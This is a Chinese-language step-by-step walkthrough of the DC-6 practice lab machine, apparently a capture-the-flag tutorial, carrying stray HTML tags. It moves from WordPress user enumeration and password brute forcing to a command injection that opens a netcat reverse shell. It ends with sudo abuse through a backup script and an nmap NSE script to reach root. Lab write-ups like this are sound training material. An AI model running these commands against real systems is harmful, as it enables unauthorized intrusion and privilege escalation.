DC-6靶机渗透测试详细教学文档<\/h1>

信息收集阶段<\/h2>

1. 目标发现<\/h3>
使用ARP扫描发现目标IP：
arp-scan -l
<\/span><\/span><\/code><\/pre>发现目标IP为192.168.130.146<\/code><\/li>
<\/ul>
2. 端口扫描<\/h3>

使用nmap扫描开放端口和服务：
nmap 192.168.130.146
<\/span><\/span><\/code><\/pre>发现开放了：

22端口：SSH服务<\/li>
80端口：Web服务<\/li>
<\/ul>
<\/li>
<\/ul>
3. SSH暴力破解尝试<\/h3>

尝试使用nmap脚本爆破SSH：
nmap --script=<\/span>ssh-brute 192.168.130.146
<\/span><\/span><\/code><\/pre>爆破失败，放弃此路径<\/li>
<\/ul>
4. Web服务侦察<\/h3>

发现无法直接访问Web服务，URL栏显示"wordy"<\/li>
修改hosts文件：
vi \/etc\/hosts
<\/span><\/span><\/code><\/pre>添加：
192.168.130.146 wordy
<\/code><\/pre>
<\/li>
<\/ul>
5. 目录扫描<\/h3>

使用dirsearch扫描Web目录：
dirsearch -u http:\/\/wordy
<\/span><\/span><\/code><\/pre>发现登录入口，但缺少凭证<\/li>
<\/ul>
6. WordPress用户枚举<\/h3>

使用wpscan枚举用户：
wpscan --url http:\/\/wordy -e u
<\/span><\/span><\/code><\/pre>获取用户列表：admin、graham、sarah、mark、jens<\/li>
<\/ul>
7. 密码爆破<\/h3>

解压密码字典：
gzip -dk \/usr\/share\/wordlists\/rockyou.txt.gz
<\/span><\/span><\/code><\/pre><\/li>
根据提示筛选包含"k01"的密码：
cat \/usr\/share\/wordlists\/rockyou.txt | grep k01 > passwords.txt
<\/span><\/span><\/code><\/pre><\/li>
使用wpscan爆破：
wpscan --url http:\/\/wordy -U user.txt -P passwords.txt
<\/span><\/span><\/code><\/pre>成功获取凭证：mark\/helpdesk01<\/li>
<\/ul>
初始访问<\/h2>
1. Web登录<\/h3>

使用凭证mark\/helpdesk01登录WordPress后台<\/li>
<\/ul>
2. 命令注入漏洞利用<\/h3>

发现IP转换功能存在命令注入点<\/li>
测试命令注入：
1.1 | whoami
<\/code><\/pre>
确认可执行命令<\/li>
<\/ul>
3. 反弹Shell<\/h3>

开启监听：
nc -lvnp 8888<\/span>
<\/span><\/span><\/code><\/pre><\/li>
通过Burp Suite发送反弹命令（因输入长度限制）：
1.1 | nc 192.168.130.128 8888 -e \/bin\/sh
<\/code><\/pre>
<\/li>
升级为交互式Shell：
python -c 'import pty;pty.spawn("\/bin\/bash")'<\/span>
<\/span><\/span><\/code><\/pre><\/li>
<\/ul>
权限提升<\/h2>
1. 横向移动至graham用户<\/h3>

在mark目录发现graham的密码：
graham - GSo7isUM1D4
<\/code><\/pre>
<\/li>
切换用户：
su graham
<\/span><\/span><\/code><\/pre><\/li>
<\/ul>
2. 检查sudo权限<\/h3>
sudo -l
<\/span><\/span><\/code><\/pre>发现可以无密码以jens用户执行\/home\/jens\/backups.sh<\/code><\/p>
3. 利用备份脚本提权<\/h3>

查看备份脚本内容：
cat \/home\/jens\/backups.sh
<\/span><\/span><\/code><\/pre><\/li>
尝试注入命令：
echo '\/bin\/bash'<\/span> >> \/home\/jens\/backups.sh
<\/span><\/span>sudo -u jens \/home\/jens\/backups.sh
<\/span><\/span><\/code><\/pre>成功切换到jens用户<\/li>
<\/ul>
4. 最终提权至root<\/h3>

检查jens的sudo权限：
sudo -l
<\/span><\/span><\/code><\/pre>发现可以以root身份执行nmap<\/li>
创建nmap脚本提权：
echo 'os.execute("\/bin\/sh")'<\/span> > getshell.nse
<\/span><\/span>sudo nmap --script=<\/span>getshell.nse
<\/span><\/span><\/code><\/pre>成功获取root权限<\/li>
<\/ul>
获取flag<\/h2>

查找flag文件：
find \/ -name *flag*
<\/span><\/span><\/code><\/pre><\/li>
查看flag内容：
cat \/root\/theflag.txt
<\/span><\/span><\/code><\/pre><\/li>
<\/ul>
总结<\/h2>
本渗透测试过程涉及：<\/p>

信息收集（ARP扫描、端口扫描、目录枚举）<\/li>
凭证爆破（用户枚举、密码爆破）<\/li>
Web漏洞利用（命令注入）<\/li>
权限提升（横向移动、sudo滥用、nmap提权）<\/li>
<\/ol>
关键点：<\/p>

注意靶机提示（密码包含k01）<\/li>
命令注入时注意长度限制<\/li>
仔细检查每个用户的sudo权限<\/li>
灵活利用各种工具的特性进行提权<\/li>
<\/ul>